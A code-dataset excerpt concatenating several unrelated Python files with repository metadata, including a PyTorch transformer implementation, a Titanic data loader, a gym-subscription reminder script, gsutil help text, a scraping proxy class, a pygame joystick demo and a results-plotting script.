new_x_shape = x.size()[:-1] + (self.n_head, x.size(-1) // self.n_head)
x = x.view(*new_x_shape) # in Tensorflow implem: fct split_states
if k:
return x.permute(0, 2, 3, 1)
else:
return x.permute(0, 2, 1, 3)
def forward(self, x):
x = self.c_attn(x)
query, key, value = x.split(self.split_size, dim=2)
query = self.split_heads(query)
key = self.split_heads(key, k=True)
value = self.split_heads(value)
a = self._attn(query, key, value)
a = self.merge_heads(a)
a = self.c_proj(a)
a = self.resid_dropout(a)
return a
class MLP(nn.Module):
def __init__(self, n_state, cfg): # in MLP: n_state=3072 (4 * n_embd)
super(MLP, self).__init__()
nx = cfg.n_embd
self.c_fc = Conv1D(n_state, 1, nx)
self.c_proj = Conv1D(nx, 1, n_state)
self.act = ACT_FNS[cfg.afn]
self.dropout = nn.Dropout(cfg.resid_pdrop)
def forward(self, x):
h = self.act(self.c_fc(x))
h2 = self.c_proj(h)
return self.dropout(h2)
class Block(nn.Module):
def __init__(self, n_ctx, cfg, scale=False):
super(Block, self).__init__()
nx = cfg.n_embd
self.attn = Attention(nx, n_ctx, cfg, scale)
self.ln_1 = LayerNorm(nx)
self.mlp = MLP(4 * nx, cfg)
self.ln_2 = LayerNorm(nx)
def forward(self, x):
a = self.attn(x)
n = self.ln_1(x + a)
m = self.mlp(n)
h = self.ln_2(n + m)
return h
class TransformerModel(nn.Module):
""" Transformer model """
def __init__(self, cfg, vocab=40990, n_ctx=512):
super(TransformerModel, self).__init__()
self.vocab = vocab
self.embed = nn.Embedding(vocab, cfg.n_embd)
self.drop = nn.Dropout(cfg.embd_pdrop)
block = Block(n_ctx, cfg, scale=True)
self.h = nn.ModuleList([copy.deepcopy(block) for _ in range(cfg.n_layer)])
self.decoder = nn.Linear(cfg.n_embd, vocab, bias=False)
self.decoder.weight = self.embed.weight # Tied weights
self.clf_dropout = nn.Dropout2d(cfg.clf_pdrop) # To reproduce the noise_shape parameter of TF implementation
nn.init.normal_(self.embed.weight, std=0.02)
def forward(self, x):
x = x.view(-1, x.size(-2), x.size(-1))
e = self.embed(x)
h = e.sum(dim=2)
for block in self.h:
h = block(h)
return h
class LMHead(nn.Module):
""" Language Model Head for the transformer """
def __init__(self, model, cfg):
super(LMHead, self).__init__()
self.n_embd = cfg.n_embd
embed_shape = model.embed.weight.shape
self.decoder = nn.Linear(embed_shape[1], embed_shape[0], bias=False)
self.decoder.weight = model.embed.weight # Tied weights
def forward(self, h):
# Truncated Language modeling logits (we remove the last token)
h_trunc = h[:, :-1].contiguous().view(-1, self.n_embd)
lm_logits = self.decoder(h_trunc)
return lm_logits
class ClfHead(nn.Module):
""" Classifier Head for the transformer """
def __init__(self, clf_token, cfg):
super(ClfHead, self).__init__()
self.n_embd = cfg.n_embd
self.clf_token = clf_token
self.dropout = nn.Dropout2d(cfg.clf_pdrop) # To reproduce the noise_shape parameter of TF implementation
self.linear = nn.Linear(cfg.n_embd, 1)
nn.init.normal_(self.linear.weight, std=0.02)
nn.init.normal_(self.linear.bias, 0)
def forward(self, h, x):
# Classification logits
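        # Keep only the hidden state at the position of the special clf_token in each
        # sequence; that vector feeds the linear classifier.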
clf_h = h.view(-1, self.n_embd)
flat = x[:, :, :, 0].contiguous().view(-1)
clf_h = clf_h[flat == self.clf_token, :]
clf_h = clf_h.view(-1, x.size(1), self.n_embd, 1)
clf_h = self.dropout(clf_h)
clf_h = clf_h.view(-1, self.n_embd)
clf_logits = self.linear(clf_h)
return clf_logits.view(-1, x.size(1))
class DoubleHeadModel(nn.Module):
""" Transformer with language model and classification heads """
def __init__(self, cfg, clf_token, vocab=40990, n_ctx=512):
super(DoubleHeadModel, self).__init__()
self.transformer = TransformerModel(cfg, vocab=vocab, n_ctx=n_ctx)
self.lm_head = LMHead(self.transformer, cfg)
self.clf_head = ClfHead(clf_token, cfg)
def forward(self, x):
h = self.transformer(x)
lm_logits = self.lm_head(h)
clf_logits = self.clf_head(h, x)
return lm_logits, clf_logits
def load_openai_pretrained_model(model, n_ctx=-1, n_special=-1, n_transfer=12, n_embd=768, path='./model/',
path_names='./'):
# Load weights from TF model
print("Loading weights...")
names = json.load(open(path_names + 'parameters_names.json'))
shapes = json.load(open(path + 'params_shapes.json'))
offsets = np.cumsum([np.prod(shape) for shape in shapes])
init_params = [np.load(path + 'params_{}.npy'.format(n)) for n in range(10)]
init_params = np.split(np.concatenate(init_params, 0), offsets)[:-1]
init_params = [param.reshape(shape) for param, shape in zip(init_params, shapes)]
if n_ctx > 0:
init_params[0] = init_params[0][:n_ctx]
if n_special > 0:
init_params[0] = np.concatenate(
[init_params[1],
(np.random.randn(n_special, n_embd) * 0.02).astype(np.float32),
init_params[0]
], 0)
else:
init_params[0] = np.concatenate(
[init_params[1],
init_params[0]
], 0)
del init_params[1]
if n_transfer == -1:
n_transfer = 0
else:
n_transfer = 1 + n_transfer * 12
init_params = [arr.squeeze() for arr in init_params]
try:
assert model.embed.weight.shape == init_params[0].shape
except AssertionError as e:
e.args += (model.embed.weight.shape, init_params[0].shape)
raise
model.embed.weight.data = torch.from_numpy(init_params[0])
for name, ip in zip(names[1:n_transfer], init_params[1:n_transfer]):
name = name[6:] # skip "model/"
assert name[-2:] == ":0"
name = name[:-2]
name = name.split('/')
pointer = model
for m_name in name:
if re.fullmatch(r'[A-Za-z]+\d+', m_name):
l = re.split(r'(\d+)', m_name)
else:
l = [m_name]
pointer = getattr(pointer, l[0])
if len(l) >= 2:
num = int(l[1])
pointer = pointer[num]
try:
assert pointer.shape == ip.shape
except AssertionError as e:
e.args += (pointer.shape, ip.shape)
raise
pointer.data = torch.from_numpy(ip)
class dotdict(dict):
"""dot.notation access to dictionary attributes"""
__getattr__ = dict.get
__setattr__ = dict.__setitem__
__delattr__ = dict.__delitem__
DEFAULT_CONFIG = dotdict({
'n_embd': 768,
'n_head': 12,
'n_layer': 12,
'embd_pdrop': 0.1,
'attn_pdrop': 0.1,
'resid_pdrop': 0.1,
'afn': 'gelu',
'clf_pdrop': 0.1})
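# Illustrative only (not part of the original file): with the default configuration, the
# double-headed model could be assembled roughly as follows, where clf_token is whatever
# index the caller reserved for its classification token:
#
#     model = DoubleHeadModel(DEFAULT_CONFIG, clf_token=40478, vocab=40990, n_ctx=512)
#     load_openai_pretrained_model(model.transformer, n_ctx=512, n_special=3)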
| 32.827362
| 117
| 0.583052
|
21d82f22a9d26170891ff7c50f456ea5e5870f65
| 2,455
|
py
|
Python
|
.history/src/data/data_20191018132944.py
|
bkraft4257/kaggle_titanic
|
f29ea1773773109a867278c001dbd21a9f7b21dd
|
[
"MIT"
] | null | null | null |
.history/src/data/data_20191018132944.py
|
bkraft4257/kaggle_titanic
|
f29ea1773773109a867278c001dbd21a9f7b21dd
|
[
"MIT"
] | null | null | null |
.history/src/data/data_20191018132944.py
|
bkraft4257/kaggle_titanic
|
f29ea1773773109a867278c001dbd21a9f7b21dd
|
[
"MIT"
] | null | null | null |
import pandas as pd
from typing import Union
from pathlib import Path
from nameparser import HumanName
class ExtractData:
title_translator = {
"Mlle.": "Mrs.",
"Mme.": "Mrs.",
"Sir.": "Mr.",
"Ms.": "Mrs.",
"": "Mr.",
"Col.": "Mr.",
"Capt.": "Mr.",
"Lady.": "Mrs.",
"the Countess. of": "Mrs.",
}
def __init__(self, filename: Union[str, Path], drop_columns=None):
# """Extract Training Data from file or Path
# Arguments:
# filename {[str]} -- Filename of CSV data file containing data.
# drop_columns -- Columns in dataframe that should be dropped.
# """
if drop_columns is None:
drop_columns = ["age", "cabin", "name", "ticket"]
self.filename = filename
self.drop_columns = drop_columns
self.all_label_columns = ["survived"]
self.all_feature_columns = [
"pclass",
"name",
"sex",
"age",
"sibsp",
"parch",
"ticket",
"fare",
"cabin",
"embarked",
]
self.Xy_raw = None
self.Xy = None
self.extract_raw()
self.Xy = self.Xy_raw.copy()
self.extract_title()
self.extract_last_name()
def extract_raw(self):
"""
Extracts data from a CSV file.
Returns:
pd.DataFrame -- [description]
"""
Xy_raw = pd.read_csv(self.filename)
Xy_raw.columns = Xy_raw.columns.str.lower().str.replace(" ", "_")
Xy_raw["pclass"] = Xy_raw["pclass"].astype("category")
self.Xy_raw = Xy_raw.set_index("passengerid")
    def estimate_age(self):
        """Estimate missing passenger ages. Not implemented yet."""
        raise NotImplementedError
def extract_title(self):
"""[summary]
"""
self.Xy["title"] = (
self.Xy.name.apply(lambda x: HumanName(x).title)
.replace(self.title_translator)
.replace({"\.": ""}, regex=True)
)
def extract_last_name(self):
self.Xy["last_name"] = self.Xy.name.apply(lambda x: HumanName(x).last)
def clean(self,):
"""Clean data to remove missing data and "unnecessary" features.
Arguments:
in_raw_df {pd.DataFrame} -- Dataframe containing all columns and rows Kaggle Titanic Training Data set
"""
self.Xy = self.Xy_raw.drop(self.drop_columns, axis=1)
| 26.978022
| 114
| 0.524644
|
3666c993ff811cb5f245c2bc6e0c20a84885f945
| 6,082
|
py
|
Python
|
CheckSubscription.py
|
SaiVikhyath/FitnessGarage
|
e345d295e13f6ba307d324203c9c62e7ea2f79e7
|
[
"MIT"
] | 1
|
2021-12-20T21:00:07.000Z
|
2021-12-20T21:00:07.000Z
|
CheckSubscription.py
|
SaiVikhyath/FitnessGarage
|
e345d295e13f6ba307d324203c9c62e7ea2f79e7
|
[
"MIT"
] | null | null | null |
CheckSubscription.py
|
SaiVikhyath/FitnessGarage
|
e345d295e13f6ba307d324203c9c62e7ea2f79e7
|
[
"MIT"
] | null | null | null |
import psycopg2
import smtplib
import logging
import datetime
import requests
import json
from dateutil.relativedelta import relativedelta
SERVER = "smtp.gmail.com"
PORT = 587
FROM = "fitnessgaragehyd@gmail.com"
SUBJECT = "GYM SUBSCRIPTION ENDING"
smsURL = "https://www.fast2sms.com/dev/bulkV2"
numbersList = ""
aboutToEndData = {}
endsData = {}
subscriptionEndsList = []
try:
logging.basicConfig(filename="CheckSubscriptionLog.log", format="%(asctime)s %(message)s", filemode="a")
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
except:
print("Unable to open log file")
try:
con = psycopg2.connect(database="*********", user="*********", password="*********", host="127.0.0.1", port="5432")
except:
logger.error("DB connection failed!!!")
cur = con.cursor()
detailsQuery = "select * from GymMembers;"
cur.execute(detailsQuery)
gymDetails = cur.fetchall()
for i in gymDetails:
regNo = i[0]
name = i[1]
mobileNo = i[2]
emailID = i[3]
subscriptionDuration = i[5]
subscriptionStartDate = datetime.datetime.fromtimestamp(int(i[4]))
subscriptionStartDate = subscriptionStartDate.date()
subscriptionEndDate = datetime.datetime.fromtimestamp(int(i[4])) + relativedelta(months=int(i[5]))
subscriptionEndDate = subscriptionEndDate.date()
reminderDate = subscriptionEndDate + relativedelta(days=-3)
today = datetime.datetime.now().date()
print("RECEIPT NO : ", regNo)
print("NAME : ", name)
print("MOBILE NUMBER : ", mobileNo)
print("EMAIL ID : ", emailID)
print("SUBSCRIPTION START : ", subscriptionStartDate)
print("SUBSCRIPTION END : ", subscriptionEndDate)
print("REMINDER DATE : ", reminderDate)
print("TODAY : ", today)
if today >= reminderDate:
if today > subscriptionEndDate:
print("ENDED ON : ", subscriptionEndDate)
if int(str(today - subscriptionEndDate).split(" ")[0]) >= 3:
cur.execute("delete from GymMembers where phonenumber=(%s)",(mobileNo,))
con.commit()
elif today < subscriptionEndDate:
endsIndays = str(subscriptionEndDate - today).split(',')[0]
aboutToEndData = {
"route" : "v3",
"sender_id" : "FitnessGarage",
"message" : "\n" + name + "\n\nThis is to notify you that your gym subscription ends in " + endsIndays + ". Please renew your subscription.\n\nThanks & Regards\nPraveen Yadav\nFitness Garage\n\n",
"language" : "english",
"flash" : 0,
"numbers" : mobileNo,
}
headers = {
"authorization" : "************",
"Content-Type" : "application/x-www-form-urlencoded",
"Cache-Control" : "no-cache"
}
response = requests.request("POST", smsURL, data=aboutToEndData, headers=headers)
msg = json.loads(response.text)
print(msg)
print("Ends in " + endsIndays)
BODY = "\n\n\nHello " + name + ", \n\nThis is to notify you that your gym subscription ends in " + endsIndays + ". Please renew your subscription.\n\nThanks & Regards\nPraveen Yadav\nFitness Garage\n\n"
message = """From: %s\r\nTo: %s\nSubject: %s\n\n\n%s""" % (FROM, emailID, SUBJECT, BODY)
server = smtplib.SMTP_SSL(SERVER, 465)
server.login(FROM, "********")
server.sendmail(FROM, emailID, message)
server.quit()
else:
endsData = {
"route" : "v3",
"sender_id" : "FitnessGarage",
"message" : "\n" + name + "\n\nThis is to notify you that your gym subscription ends today. Please renew your subscription.\n\nThanks & Regards\nPraveen Yadav\nFitness Garage",
"language" : "english",
"flash" : 0,
"numbers" : mobileNo,
}
headers = {
"authorization" : "***********",
"Content-Type" : "application/x-www-form-urlencoded",
"Cache-Control" : "no-cache"
}
response = requests.request("POST", smsURL, data=endsData, headers=headers)
msg = json.loads(response.text)
print(msg)
print("ENDS TODAY : ", subscriptionEndDate)
subscriptionEndsList.append(name)
BODY = "Hello " + name + ", \n\n\tThis is to notify you that your gym subscription ends today. Please renew your subscription.\n\nThanks & Regards\nPraveen Yadav\nFitness Garage"
message = """From: %s\r\nTo: %s\nSubject: %s\n\n\n%s""" % (FROM, emailID, SUBJECT, BODY)
server = smtplib.SMTP_SSL(SERVER, 465)
server.login(FROM, "***********")
server.sendmail(FROM, emailID, message)
server.quit()
else:
print("SUBSCRIPTION NOT ENDING IN NEXT 7 DAYS!!")
subscriptionEndsString = ", ".join(subscriptionEndsList)
subscriptionEndsData = {
"route" : "v3",
"sender_id" : "FitnessGarage",
"message" : "\nPraveen\n\nThis is to notify you that the following customer's gym subscription ends today.\n\nNames : "+ subscriptionEndsString +"\n\nThanks\nFitness Garage",
"language" : "english",
"flash" : 0,
"numbers" : mobileNo,
}
headers = {
"authorization" : "*************",
"Content-Type" : "application/x-www-form-urlencoded",
"Cache-Control" : "no-cache"
}
if subscriptionEndsList:
response = requests.request("POST", smsURL, data=subscriptionEndsData, headers=headers)
msg = json.loads(response.text)
print("\n\n\n" + str(msg))
BODY = "Hello Praveen\n\n\tThis is to notify you that the following customer's gym subscription ends today.\n\nNames : "+ subscriptionEndsString +"\n\nThanks\nFitness Garage"
message = """From: %s\r\nTo: %s\nSubject: %s\n\n\n%s""" % (FROM, FROM, "SUBSCRIPTIONS ENDING TODAY", BODY)
server = smtplib.SMTP_SSL(SERVER, 465)
server.login(FROM, "**********")
server.sendmail(FROM, FROM, message)
server.quit()
| 41.37415
| 214
| 0.603256
|
b2790878b2079935af79aebec00dc82ff33bb3eb
| 6,378
|
py
|
Python
|
platform/gsutil/gslib/addlhelp/command_opts.py
|
IsaacHuang/google-cloud-sdk
|
52afa5d1a75dff08f4f5380c5cccc015bf796ca5
|
[
"Apache-2.0"
] | null | null | null |
platform/gsutil/gslib/addlhelp/command_opts.py
|
IsaacHuang/google-cloud-sdk
|
52afa5d1a75dff08f4f5380c5cccc015bf796ca5
|
[
"Apache-2.0"
] | null | null | null |
platform/gsutil/gslib/addlhelp/command_opts.py
|
IsaacHuang/google-cloud-sdk
|
52afa5d1a75dff08f4f5380c5cccc015bf796ca5
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright 2012 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Additional help about gsutil command-level options."""
from __future__ import absolute_import
from gslib.help_provider import HelpProvider
_DETAILED_HELP_TEXT = ("""
<B>SYNOPSIS</B>
Top-level gsutil Options
<B>DESCRIPTION</B>
gsutil supports separate options for the top-level gsutil command and
  the individual sub-commands (like cp, rm, etc.). The top-level options
  control behavior of gsutil that applies across commands. For example, in
the command:
gsutil -m cp -p file gs://bucket/obj
the -m option applies to gsutil, while the -p option applies to the cp
sub-command.
<B>OPTIONS</B>
-D Shows HTTP requests/headers and additional debug info needed when
posting support requests.
-DD Shows HTTP requests/headers, additional debug info plus HTTP
upstream payload.
-h Allows you to specify certain HTTP headers, for example:
gsutil -h "Cache-Control:public,max-age=3600" \\
-h "Content-Type:text/html" cp ...
Note that you need to quote the headers/values that
contain spaces (such as "Content-Disposition: attachment;
filename=filename.ext"), to avoid having the shell split them
into separate arguments.
The following headers are supported:
Cache-Control
Content-Disposition
Content-Encoding
Content-Language
Content-MD5
Content-Type
Custom metadata headers with a matching Cloud Storage Provider
prefix, such as:
x-goog-meta-
Note that for gs:// URLs, the Cache Control header is specific to
the API being used. The XML API will accept any cache control
headers and return them during object downloads. The JSON API
respects only the public, private, no-cache, and max-age cache
control headers, and may add its own no-transform directive even
if it was not specified. See 'gsutil help apis' for more
information on gsutil's interaction with APIs.
See also "gsutil help setmeta" for the ability to set metadata
fields on objects after they have been uploaded.
-m Causes supported operations (acl ch, acl set, cp, mv, rm, rsync,
and setmeta) to run in parallel. This can significantly improve
performance if you are performing operations on a large number of
files over a reasonably fast network connection.
gsutil performs the specified operation using a combination of
multi-threading and multi-processing, using a number of threads
and processors determined by the parallel_thread_count and
parallel_process_count values set in the boto configuration
file. You might want to experiment with these values, as the
best values can vary based on a number of factors, including
network speed, number of CPUs, and available memory.
Using the -m option may make your performance worse if you
are using a slower network, such as the typical network speeds
offered by non-business home network plans. It can also make
your performance worse for cases that perform all operations
             locally (e.g., gsutil rsync, where both source and destination URLs
are on the local disk), because it can "thrash" your local disk.
If a download or upload operation using parallel transfer fails
before the entire transfer is complete (e.g. failing after 300 of
1000 files have been transferred), you will need to restart the
entire transfer.
Also, although most commands will normally fail upon encountering
an error when the -m flag is disabled, all commands will
continue to try all operations when -m is enabled with multiple
threads or processes, and the number of failed operations (if any)
will be reported at the end of the command's execution.
WARNING: If you use the gsutil -m option when copying data
between versioned buckets, object version ordering will not be
preserved. For more information see the
"COPYING VERSIONED BUCKETS" section under
'gsutil help versions'.
-o Set/override values in the boto configuration value, in the format
<section>:<name>=<value>, e.g. gsutil -o "Boto:proxy=host" ...
This will not pass the option to gsutil integration tests, which
run in a separate process.
-q Causes gsutil to perform operations quietly, i.e., without
reporting progress indicators of files being copied or removed,
etc. Errors are still reported. This option can be useful for
running gsutil from a cron job that logs its output to a file, for
which the only information desired in the log is failures.
-s Tells gsutil to use a simulated storage provider (for testing).
""")
class CommandOptions(HelpProvider):
"""Additional help about gsutil command-level options."""
# Help specification. See help_provider.py for documentation.
help_spec = HelpProvider.HelpSpec(
help_name='options',
help_name_aliases=['arg', 'args', 'cli', 'opt', 'opts'],
help_type='additional_help',
help_one_line_summary='Top-Level Command-Line Options',
help_text=_DETAILED_HELP_TEXT,
subcommand_help_text={},
)
| 44.915493
| 80
| 0.657259
|
86a112eaa41860f75b974e7275f9eea83ca37199
| 2,414
|
py
|
Python
|
corescrape/proxy/proxy.py
|
anewmanvs/corescrape
|
3162f7f29ca2fe1786a28e05864c3099a7a19ae0
|
[
"MIT"
] | null | null | null |
corescrape/proxy/proxy.py
|
anewmanvs/corescrape
|
3162f7f29ca2fe1786a28e05864c3099a7a19ae0
|
[
"MIT"
] | null | null | null |
corescrape/proxy/proxy.py
|
anewmanvs/corescrape
|
3162f7f29ca2fe1786a28e05864c3099a7a19ae0
|
[
"MIT"
] | null | null | null |
"""
Proxy
IMPORTANT:
* Make sure you ALWAYS use ELITE proxies, otherwise you are exposed
"""
# pylint: disable=invalid-name, too-many-instance-attributes
from core.exceptions import CoreScrapeInvalidProxy
class Proxy:
"""Defines a proxy and its useful methods"""
def __init__(self, address):
"""Constructor."""
self.ready = False # should always be the first
self.address = address
self.numtries = 0
try:
self.__ip, self.__port = address.split(':')
except ValueError:
raise CoreScrapeInvalidProxy
self.priority = 10
# Maximum number of hits on a row. After this, the up_priority will
# instead be a 'down_priority' to avoid reusing too much the same proxy.
self.max_on_a_row = 3
self.on_a_row = 0 # number of hits on a row
self.ready = True # should always be the last
def requests_formatted(self):
"""Returns the proxy in requests formatting."""
return {protocol: self.address for protocol in ['http', 'https']}
def add_up_try(self):
"""Add up a try"""
self.numtries += 1
self.down_priority()
return self.numtries
def up_priority(self, weight=1):
"""Set higher priority to this proxy"""
if self.on_a_row > self.max_on_a_row:
# Number of maximum hits reached. The informed weight is ignored here
self.down_priority(self.max_on_a_row + 1)
return
if self.priority > 0:
self.priority -= weight
self.on_a_row += 1
def down_priority(self, weight=1):
"""Set lower priority to this proxy"""
self.priority += weight
self.on_a_row = 0
def ip(self):
"""Returns the IP"""
return self.__ip
def port(self):
"""Returns the port"""
return self.__port
def num_tries(self):
"""Number of tries this proxy has made"""
return self.numtries
def __str__(self):
"""To string"""
return self.address
def __bool__(self):
"""Points if this proxy is ready"""
return self.ready
def __eq__(self, other):
"""Equality between two proxies"""
return self.priority == other.priority
def __lt__(self, other):
"""Less than two proxies"""
return self.priority < other.priority
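# Minimal usage sketch (illustrative; the address below is a documentation placeholder and
# `requests` is not a dependency of this module):
#
#     import requests
#     proxy = Proxy('203.0.113.7:8080')
#     if proxy:  # proxy parsed correctly and is ready
#         resp = requests.get('https://example.com',
#                             proxies=proxy.requests_formatted(), timeout=10)
#         proxy.up_priority() if resp.ok else proxy.down_priority()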
| 24.383838
| 81
| 0.600249
|
101e13aa6d0f1dd3929809231f4c1322759ccbd8
| 2,102
|
py
|
Python
|
demo_joystick01.py
|
svdmaar/pygame_demos
|
8fb599134ba9db7c833a53fdc152ef0784f6c4b9
|
[
"MIT"
] | null | null | null |
demo_joystick01.py
|
svdmaar/pygame_demos
|
8fb599134ba9db7c833a53fdc152ef0784f6c4b9
|
[
"MIT"
] | null | null | null |
demo_joystick01.py
|
svdmaar/pygame_demos
|
8fb599134ba9db7c833a53fdc152ef0784f6c4b9
|
[
"MIT"
] | null | null | null |
import Demo
import pygame
# https://www.pygame.org/docs/ref/joystick.html
# TODO: "hats"
class Demo_Joystick01(Demo.Demo):
def setup(self, screen):
super().setup(screen)
self.joystickCount = pygame.joystick.get_count()
defaultFontName = pygame.font.get_default_font()
fontSize = 30
self.font01 = pygame.font.SysFont(defaultFontName, fontSize)
self.countSurface = self.font01.render("Joystick count: " + str(self.joystickCount), False, (0, 0, 0))
if self.joystickCount > 0:
self.joystick0 = pygame.joystick.Joystick(0)
self.joystickNameSurface0 = self.font01.render(self.joystick0.get_name(), False, (0, 0, 0))
self.axisCount0 = self.joystick0.get_numaxes()
self.axisSurface0 = self.font01.render("Axis count: " + str(self.axisCount0), False, (0, 0, 0))
self.buttonCount0 = self.joystick0.get_numbuttons()
self.buttonSurface0 = self.font01.render("Button count: " + str(self.buttonCount0), False, (0, 0, 0))
def render(self):
# TODO: do we need to free these font surfaces?
textY = 0
self.screen.blit(self.countSurface, (0, 0))
if self.joystickCount == 0:
return
textY += 30
self.screen.blit(self.joystickNameSurface0, (0, textY))
textY += 30
self.screen.blit(self.axisSurface0, (0, textY))
for i in range(self.axisCount0):
axisStr = str(self.joystick0.get_axis(i))
axisTextSurface = self.font01.render(axisStr, False, (0, 0, 0))
textY += 30
self.screen.blit(axisTextSurface, (0, textY))
textY += 30
self.screen.blit(self.buttonSurface0, (0, textY))
for i in range(self.buttonCount0):
buttonStr = str(self.joystick0.get_button(i))
buttonTextSurface = self.font01.render(buttonStr, False, (0, 0, 0))
textY += 30
self.screen.blit(buttonTextSurface, (0, textY))
def getName(self):
return "joystick01: shows input of first joystick (if available)"
| 41.215686
| 113
| 0.620837
|
075a96e3e1cafb4f4ce71ec323a328a775945e80
| 5,840
|
py
|
Python
|
src/graficos/graficar_vecinos_10_a_100.py
|
ilebrero/Metodos-TP2
|
e44a6538cfec5eb16b294cd2371870c265dba451
|
[
"MIT"
] | null | null | null |
src/graficos/graficar_vecinos_10_a_100.py
|
ilebrero/Metodos-TP2
|
e44a6538cfec5eb16b294cd2371870c265dba451
|
[
"MIT"
] | null | null | null |
src/graficos/graficar_vecinos_10_a_100.py
|
ilebrero/Metodos-TP2
|
e44a6538cfec5eb16b294cd2371870c265dba451
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
import matplotlib.pyplot as plt
from math import log
y_f1 = []
y_f1_promedio = []
y_hitrate = []
y_hitrate_promedio = []
y_recalls = []
y_recalls_promedio_iteracion = []
y_recalls_promedio_clase = []
y_precision = []
y_precision_promedio_iteracion = []
y_precision_promedio_clase = []
y_tiempo = []
# MODIFY THIS IF YOU WANT DIFFERENT VALUES ON THE X AXIS OF THE PLOTS
# x_clase holds the iterations obtained by sweeping whichever parameter is being varied
x_clase = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100] # For example, here the number of neighbours varies from 10 to 100
K = 10 # K of the k-fold cross-validation
cant_iteraciones = len(x_clase) # modify x. RANGE OF THE VARIABLE
# x_iteracion is used for plotting: for each iteration of the variable being varied, every iteration of the K-fold cross-validation
# That is why it is computed as cant_iteraciones * K
x_iteracion = []
a = 10
for j in range(0, cant_iteraciones):
for i in range (0, K):
x_iteracion.append(a)
a += 10
# MODIFY THE NAME OF THE FOLDER THE DATA IS READ FROM (and the file extension; I absent-mindedly gave them .tex)
# Example:
# f = open('../resultados/MI_CARPETA/f1.tex', 'r')
promedio = 0
f = open('../resultados/PLSDA_vecinos_10_a_100_dimension_10/f1.tex', 'r')
for j in range(0, cant_iteraciones):
for i in range(0, K):
aux = float(f.readline()[:-1])
promedio += aux
y_f1.append(aux)
promedio /= K
y_f1_promedio.append(promedio)
promedio = 0
f = open('../resultados/PLSDA_vecinos_10_a_100_dimension_10/hitrate.tex', 'r')
promedio = 0
for j in range(0, cant_iteraciones):
for i in range(0, K):
aux = float(f.readline()[:-1])
promedio += aux
y_hitrate.append(aux)
promedio /= K
y_hitrate_promedio.append(promedio)
promedio = 0
f = open('../resultados/PLSDA_vecinos_10_a_100_dimension_10/recalls.tex', 'r')
prom = 0
for j in range(0, cant_iteraciones):
for i in range(0, K):
for z in range(0, 10):
y_recalls.append(float(f.readline()[:-1]))
promedio = float(f.readline()[:-1])
prom += promedio
y_recalls_promedio_iteracion.append(promedio)
prom /= K
y_recalls_promedio_clase.append(prom)
prom = 0
f = open('../resultados/PLSDA_vecinos_10_a_100_dimension_10/precisiones.tex', 'r')
for j in range(0, cant_iteraciones):
for i in range(0, K):
for z in range(0, 10):
y_precision.append(float(f.readline()[:-1]))
promedio = float(f.readline()[:-1])
prom += promedio
y_precision_promedio_iteracion.append(promedio)
prom /= K
y_precision_promedio_clase.append(prom)
prom = 0
# UNCOMMENT IF TIMING MEASUREMENTS WERE ALSO TAKEN
#promedio = 0
#f = open('../resultados/PLSDA_vecinos_10_a_100_dimension_10/tiempos.tex', 'r')
#for j in range(0, cant_iteraciones):
# for i in range(0, K):
# promedio += float(f.readline()[:-1])
#
# promedio /= K
# y_tiempo.append(promedio)
# promedio = 0
# FOR THE IMAGES TO BE SAVED, YOU MUST CREATE A FOLDER CALLED "graficos" INSIDE YOUR RESULTS FOLDER
# Example:
# plt.savefig('../resultados/MI_CARPETA/graficos/precisiones_clase.png')
# FIRST IMAGE
error_config = {'ecolor': '0.3'}
bar_width = 0.96
opacity = 0.4
plt.plot(x_clase, y_precision_promedio_clase, 'ro', #bar_width,
alpha=opacity,
color='b',
#error_kw=error_config,
label=u"Precisión del categorizador")
plt.xlabel(u"cantidad de vecinos")
plt.ylabel(u"Precisión")
plt.legend()
plt.savefig('../resultados/PLSDA_vecinos_10_a_100_dimension_10/graficos/precisiones_clase.png')
plt.show()
# SECOND IMAGE
plt.plot(x_iteracion, y_precision_promedio_iteracion, 'ro', #bar_width,
alpha=opacity,
color='b',
label=u"Precisión del categorizador por clase")
plt.xlabel(u"cantidad de vecinos")
plt.ylabel(u"Precisión")
plt.legend()
plt.tight_layout()
plt.savefig('../resultados/PLSDA_vecinos_10_a_100_dimension_10/graficos/precisiones_iteracion.png')
plt.show()
# THIRD IMAGE
plt.plot(x_clase, y_recalls_promedio_clase, 'ro', #bar_width,
alpha=opacity,
color='b',
label=u"recall del categorizador")
plt.xlabel(u"cantidad de vecinos")
plt.ylabel(u"Recall")
plt.legend()
plt.tight_layout()
plt.savefig('../resultados/PLSDA_vecinos_10_a_100_dimension_10/graficos/recall_clase.png')
plt.show()
# FOURTH IMAGE
plt.plot(x_iteracion, y_recalls_promedio_iteracion, 'ro', #bar_width,
alpha=opacity,
color='b',
label=u"recall del categorizador por clase")
plt.xlabel(u"cantidad de vecinos")
plt.ylabel(u"Recall")
plt.legend()
plt.tight_layout()
plt.savefig('../resultados/PLSDA_vecinos_10_a_100_dimension_10/graficos/recall_iteracion.png')
plt.show()
# FIFTH IMAGE
plt.plot(x_clase, y_hitrate_promedio, 'ro', #bar_width,
alpha=opacity,
color='b',
label=u"Hit rate del categorizador")
plt.xlabel(u"cantidad de vecinos")
plt.ylabel(u"Hit rate")
plt.legend()
plt.tight_layout()
plt.savefig('../resultados/PLSDA_vecinos_10_a_100_dimension_10/graficos/hitrate_promedio.png')
plt.show()
# SIXTH IMAGE
plt.plot(x_clase, y_f1_promedio, 'ro', #bar_width,
alpha=opacity,
color='b',
label=u"F1 del categorizador")
plt.xlabel(u"cantidad de vecinos")
plt.ylabel(u"F1")
plt.legend()
plt.tight_layout()
plt.savefig('../resultados/PLSDA_vecinos_10_a_100_dimension_10/graficos/F1_promedio.png')
plt.show()
# SEVENTH IMAGE
# UNCOMMENT IF TIMING MEASUREMENTS WERE TAKEN
#plt.plot(x_clase, y_tiempo, 'ro', #bar_width,
# alpha=opacity,
# color='b',
# label=u"Tiempo del PLSDA+kNN")
#
#plt.xlabel(u"cantidad de vecinos")
#plt.ylabel(u"tiempo")
#plt.legend()
